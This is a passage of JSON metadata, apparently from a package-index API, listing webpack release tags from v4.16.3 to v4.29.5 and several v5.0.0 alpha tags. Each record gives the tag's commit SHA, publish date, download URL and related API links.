8T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url